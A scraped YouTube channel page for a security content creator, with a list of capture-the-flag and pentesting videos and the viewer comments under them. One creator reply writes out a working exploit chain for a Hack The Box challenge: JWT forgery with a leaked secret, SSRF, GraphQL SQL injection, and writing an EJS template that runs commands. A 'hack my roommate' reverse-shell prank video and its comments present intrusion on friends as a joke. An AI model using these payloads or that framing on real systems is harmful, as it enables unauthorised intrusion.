Milos Markovic
Milos Markovic
  • 11
  • 12 041

Відео

How Online Copy-Paste Could Expose Your Data #cybersecurity
Переглядів 495 місяців тому
How Online Copy-Paste Could Expose Your Data #cybersecurity
CVE-2023-45539 & CVE-2022-39227 | HTB LockTalk Web Challange
Переглядів 775 місяців тому
In this video, I went over HTB LockTalk which includes CVE-2023-45539 & CVE-2022-39227.
Data Exfiltration using Curl and Python with SSTI RCE | HTB Labyrinth Linguist Web Challenge
Переглядів 2475 місяців тому
In this video, I went over Data exfiltration using Curl and Python with the help of Server Site Template Injection RCE.
Burp Suite Certified Practitioner Exam Review 2024
Переглядів 1 тис.6 місяців тому
In this video, I provide an in-depth review of the BSCP Exam, along with valuable tips and strategies to help you prepare and succeed.
Hack The Box Blueprint Heist Web Challenge
Переглядів 2816 місяців тому
In today's video, I went over the Blueprint Heist challenge from HTB Business CTF 2024.
Hack The Box Jailbreak Web Challenge
Переглядів 3536 місяців тому
In this video, I went over a recently retired HTB Challenge called Jailbreak which was about XXE Injection. Thank you for watching! #hackthebox #XXE #WebAppPentesting #burpsuite
Linux Privilege Escalation with SUID sed Command
Переглядів 247 місяців тому
In this video, I demonstrated a simple privilege escalation technique with the SUID bit set on the sed command. #cybersecurity #linux #privesc #pentesting
OpenVPN Peer Certificate Verification Failure #openvpn #hackthebox
Переглядів 7 тис.10 місяців тому
In this video, I explained how to overcome the "Peer Certificate Verification Failure" Error message from OpenVPN when connecting to HackTheBox Network from Windows Machine. P.S. I don't know why my mouse is not showing up on the video, sorry for that!
Hacking My Roommate with Metasploit Reverse Shell!
Переглядів 2,3 тис.Рік тому
Hey, hackers and tech enthusiasts! 👋 In this video, I dive into the world of ethical hacking with a touch of humor as I explore the fascinating realm of Metasploit and reverse shells. Join me on this laughter-packed journey as I demonstrate how to use Metasploit for educational purposes, pranking friends in a lighthearted manner. We'll uncover the power of ethical hacking while sharing a few la...
Cloudgoat S3 ACL Error
Переглядів 177Рік тому
In this video, I talked about how to solve ACL Errors when deploying a Cloudgoat scenario that has an S3 bucket in its resources.

КОМЕНТАРІ

  • @CuliRBLX
    @CuliRBLX 7 днів тому

    Great video Milos!

  • @other6724
    @other6724 8 днів тому

    didn't work. still get the same error

  • @Baikanikintrist
    @Baikanikintrist 10 днів тому

    But how do i solve it on Android?

    • @milosmarkovic4566
      @milosmarkovic4566 10 днів тому

      @@Baikanikintrist Hello, thanks for watching! That is a great question!Unfortunately I didn’t test it out on Android so I don’t have an answer.

  • @Salih-rz6yl
    @Salih-rz6yl 16 днів тому

    Hey thanks for the tutorial. But how did you know that the flag.txt is in the root directory? What if the flag.txt was in a folder and in another subfolder etc. ...How to find out?

    • @milosmarkovic4566
      @milosmarkovic4566 15 днів тому

      Hello, no problem, thank you for watching! That is an amazing question! So in this particular scenario, after I identified XML Injection by being able to read /etc/passwd, my next payload was for the flag.txt. So I didn't spend too much time trying to read the flag from other directories such as /home/flag.txt or /var/www/html/flag.txt, etc.When it comes to XXE usually you would try to read local files that are mostly present on every system such as /etc/passwd for UNIX machines or C:/Windows/win.ini on Windows boxes, it can be challenging with XXE to enumerate other files that are not common. In this case, with HTB Challenges we know that we are aiming for flag.txt so if I didn't find it with a payload such as file:///flag.txt I would try different directories such as /home/flag.txt or /opt/flag.txt or similar. I think for this challenge they simply placed it in the current directory so you don't have to spend time enumerating the system for a flag, bur rather exploiting XXE Injection. I hope this helps! Please let me know if you have any other questions/thoughts!

  • @__pain__05
    @__pain__05 Місяць тому

    Can we use Burp Pro Trial[15 days] version ? On exam?

    • @milosmarkovic4566
      @milosmarkovic4566 Місяць тому

      Thank you for watching! That's a great question! I didn't find much online about this question besides this old Blog Post from PortSwigger's Forum all the way back in 2021: forum.portswigger.net/thread/free-trial-cf41d2d7bc962fd966d168dbd (you might need to scroll down to find a question from user named Tony). According to the PortSwigger reply, they do not check whether you are using a personal license or a company license nor do we check if you are using a purchased license or a trial license. Now since this was 2021, things might have changed. I think it's the best bet to ask in their Discord: discord.com/invite/portswigger

  • @TheRealVegapunk
    @TheRealVegapunk Місяць тому

    How much did this certification help you to become a web application penetration tester?

    • @milosmarkovic4566
      @milosmarkovic4566 Місяць тому

      Thank you for watching and thank you for the great question! This certificate is by far my favorite one because I enjoy web app pentesting and I love AppSec. If you would like to become a web application pentester I do believe that this certificate can help you a lot because of wide variety of topics that it covers, and it really forces the learner to understand each vulnerability in depth. This is from knowledge perspective, when it comes to Job Requirement Perspective, I don't have much experience there because I got this certificate after I landed a job, but when I was actively searching for a job I saw multiple job posting listing BSCP as preferred / required cert. Regardless if it's being listed in the Job Description or not, I think this is an amazing cert and it helped me a lot when it comes to exploiting different vulnerabilities and understanding those vulnerabilities / misconfiguration better than before. I hope this helps!

  • @mikemd866
    @mikemd866 2 місяці тому

    you saved my life lol, ty

    • @milosmarkovic4566
      @milosmarkovic4566 2 місяці тому

      @@mikemd866 No problem! I am glad that video helped! 🙂

  • @S2eedGH
    @S2eedGH 3 місяці тому

    great explanation, btw can you put the exploits so we can copy thanks

    • @milosmarkovic4566
      @milosmarkovic4566 3 місяці тому

      Thank you very much! Here are my notes for this challenge with all commands:1)for /admin & /graphql endpoint i need a valid JWT cookie with a role being set to admin 1.1)I found a JWT Secret hardcoded --> Str0ng_K3y_N0_l3ak_pl3ase? and by using jwt.io I was able to forge a cookie and to set my role to be admin 2)I found SSRF when generating report and I was able to call Collaborator 3)I was able to access /admin by forging JWT Token with jwt.io to be equal to admin for user role and by passing url in the generate-report function as : 127.0.0.1/admin?token=<token> 4)I was able to execute GraphQL Queries with he following url 127.0.0.1:1337/graphql?token=<FORGED_ADMIN_TOKEN>&query={getDataByName(name:"John"){name,department,isPresent}} 5)Now this is vulnerable to SQLI because the reqex ignores everything afer newline character,so we are UNICODING not to break the GraphQL Query, and from there we conducted classing UNION BASED Attack to find out exact number of columns(4): 127.0.0.1:1337/graphql?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3MTkwNzQyODB9.pEww2SEUcXqPFgdWzYPWBfYLNaIf-J-XMLFLm-ciRRU&query={getDataByName(name:"a\u000d\u000a'UNION SELECT NULL,NULL,NULL,NULL-- "){name,department,isPresent}} ---> note space afer comment since we are using MySQL 5.1)Now payload for combining sql injection with ejs code execution &query={getDataByName(name:"a\u000d\u000a'UNION SELECT '<%- global.process.mainModule.require(`child_process`).execSync(`/readflag`) %>',NULL,NULL,NULL INTO OUTFILE '/app/views/errors/404.ejs'-- "){name,department,isPresent}} 6)Now when we navigate to the nonexisting location 404.ejs will be triggered such as /test and we got the flag!

    • @S2eedGH
      @S2eedGH 3 місяці тому

      @@milosmarkovic4566 appreciate it

  • @imaverygoodguy
    @imaverygoodguy 3 місяці тому

    thanks a lot mate, you explain very well

    • @milosmarkovic4566
      @milosmarkovic4566 3 місяці тому

      @@imaverygoodguy Thank you very much for watching! I am glad that you found video useful ! 🙂

  • @closevote
    @closevote 4 місяці тому

    thank you

    • @milosmarkovic4566
      @milosmarkovic4566 4 місяці тому

      @@closevote Of course, it’s my pleasure! I am glad that video helped!

  • @cristiannastase5530
    @cristiannastase5530 4 місяці тому

    Thank you. How you became so good?

    • @milosmarkovic4566
      @milosmarkovic4566 4 місяці тому

      Of course! Haha far away from good, but thanks! :D

  • @noragami1555
    @noragami1555 5 місяців тому

    great video

  • @MarkoJovanovic-mb2ge
    @MarkoJovanovic-mb2ge 5 місяців тому

    Love it, Milos!!

  • @CuliRBLX
    @CuliRBLX 6 місяців тому

    This guy is going to be the best hacker in the world one day!

  • @Wii602006
    @Wii602006 6 місяців тому

    Im getting same error, was working fine for months and today I got this message, tried your solution and still not working...same error, help

    • @UKGUN1T
      @UKGUN1T 6 місяців тому

      Just had same error pls let me know if ya find a solution

    • @milosmarkovic4566
      @milosmarkovic4566 6 місяців тому

      Hmm, that is interesting! I will take a look at it, and I will let you know if I find a solution!

    • @Wii602006
      @Wii602006 6 місяців тому

      @@milosmarkovic4566 UPDATE: I sent an email to Dev and they were just having technical issues, it has been fixed :)

  • @tomtomtom456
    @tomtomtom456 7 місяців тому

    Thanks a lot

  • @MrEnsiferum77
    @MrEnsiferum77 7 місяців тому

    Not working for me...

    • @milosmarkovic4566
      @milosmarkovic4566 7 місяців тому

      Hi, what did you try so far, and what is the error message that you are facing?

    • @MrEnsiferum77
      @MrEnsiferum77 7 місяців тому

      @@milosmarkovic4566 I've figure it out. I was trying first to make it work through WSL2, but then I've tried just regular windows openvpn client, which for some reason and give me this error, but actually the problem was in generated keys (I was playing around with tryhackme). Actually tryhackme, gives u multiple regions, only one for europe keys was working... the other regions (even europe) was giving some errors both wsl2 or windows (in case of windows this error)

    • @ziadbensaada
      @ziadbensaada 5 місяців тому

      @@milosmarkovic4566 when i want to connect to tryhackme vpn

  • @andymcao
    @andymcao 7 місяців тому

    This was super helpful - thank you!

    • @milosmarkovic4566
      @milosmarkovic4566 7 місяців тому

      Thank you for watching! I am glad that video helped out! :)

  • @markobunic6734
    @markobunic6734 8 місяців тому

    Awesome, thank you!

  • @pnemonick
    @pnemonick 9 місяців тому

    Thank you so much

  • @Prince-od7od
    @Prince-od7od 9 місяців тому

    Can you do one more help? I got a foothold for a machine trying to load the RCE payload but when entering openvpn ip it's not giving me shell even though everything is correct

    • @milosmarkovic4566
      @milosmarkovic4566 9 місяців тому

      I would suggest checking your payload one more time, if you are successfully connected via OpenVPN there is no reason not to obtain the shell if everything is in place. I don't want to reveal any big spoilers, but I suggest checking what version of ysoserial you are using, and I was using PowerShell base64 encoded payload. I hope this helps!

  • @Prince-od7od
    @Prince-od7od 9 місяців тому

    Thank you so much 🙌🙌🙌

    • @milosmarkovic4566
      @milosmarkovic4566 9 місяців тому

      No Problem! I am glad that video helped! 🙂

  • @CuliRBLX
    @CuliRBLX 9 місяців тому

    Thank you Milos!

  • @MarkoJovanovic-mb2ge
    @MarkoJovanovic-mb2ge 9 місяців тому

    Great content as usual!

  • @P3ntest3r
    @P3ntest3r 9 місяців тому

    Bro thanks so much am ur new subscriber from Africa it realy help me coz i get this error for so long god bless more content 🎉🎉

    • @milosmarkovic4566
      @milosmarkovic4566 9 місяців тому

      Thank you very much! I am happy that the video helped out! I am working actively on more content! :)

  • @NickSpern
    @NickSpern 10 місяців тому

    i had similar problem with iOS and Android mobile connection, they play with this solution, thanks

    • @milosmarkovic4566
      @milosmarkovic4566 10 місяців тому

      I didn’t know that this error is occurring on mobile devices as well! I am glad that video helped!

  • @gadgetbro02
    @gadgetbro02 10 місяців тому

    in my machine, only your instruceted way can't solve this issue, so i regenrate the (.OVPN) file again. After that download and load it to OpenVpn apply your instructed setting and its booom. Connected ! [I said all of those things because some one might get sollution from my comment]

  • @CertaintyOfDeath
    @CertaintyOfDeath 10 місяців тому

    You are not the only one that had the same problem doing the same machine, ty

    • @milosmarkovic4566
      @milosmarkovic4566 10 місяців тому

      That’s right! I heard that many people were struggling with the same thing. No problem, I am glad it helped!

  • @bozhdiarjordanov6353
    @bozhdiarjordanov6353 Рік тому

    good tutorial make more for metasploit and reverse shell

    • @milosmarkovic4566
      @milosmarkovic4566 Рік тому

      Thank you! I appreciate it a lot! Noted, will do in the future, for sure!

  • @itsm3dud39
    @itsm3dud39 Рік тому

    Does this work if the victim is inside another network??

    • @milosmarkovic4566
      @milosmarkovic4566 Рік тому

      Hi, thanks for watching! In that case, I believe that would require port forwarding in order to make this happen.

  • @ytg6663
    @ytg6663 Рік тому

    Vanilla metasploit malware gets easily detected 🤣🤣

    • @milosmarkovic4566
      @milosmarkovic4566 Рік тому

      Yes, when you have AV and when you update your system, unlike my friend! That was the purpose of the video, to highlight the importance of it 🙂. Thank you for watching and commenting! 🙂

  • @sparkeyluv
    @sparkeyluv Рік тому

    I wish you would have shown us your enumeration phase

    • @milosmarkovic4566
      @milosmarkovic4566 Рік тому

      Thank you for watching and I appreciate the suggestion! Next time I will definitely do so.

  • @l_u_c_k_y_7
    @l_u_c_k_y_7 Рік тому

    555-333 pod metaspoit bato odlican video

  • @dgoncalo
    @dgoncalo Рік тому

    This is the dumbest script kid video I’ve seen, and to all the people in the comments thinking this is real hacking, ITS NOT! So first, any msfvenom payload is gonna get flagged by AV. It takes a professional to be able to correctly obfuscate the signatures these days. Secondly, why are you even hiding IP addresses on the video? You do know that those IPs are only on your local network right? They’re not actually the real public IPs. If you guys want to learn real offensive security go study with reliable sources, not some script kids

  • @samioul9180
    @samioul9180 Рік тому

    i just want to know why y u hiding your internal ip addres

  • @cryptoafc7655
    @cryptoafc7655 Рік тому

    1 sub earned - love this videos

  • @RAZREXE
    @RAZREXE Рік тому

    haha very cool, im a sub now. hilarious prank dude XD

  • @Hackashi
    @Hackashi Рік тому

    hahaha that smile on your face when he finds out.

  • @Hamstergaming11
    @Hamstergaming11 Рік тому

    Can I study with you🙏...

  • @draganomci
    @draganomci Рік тому

    Cool stuff, we need more videos like this!

  • @Maradona024
    @Maradona024 Рік тому

    Hahahah this is hilarious dude… great work on this one!

  • @MarkoJovanovic-mb2ge
    @MarkoJovanovic-mb2ge Рік тому

    Haha, brilliant! I will definitely use this to prank my friends!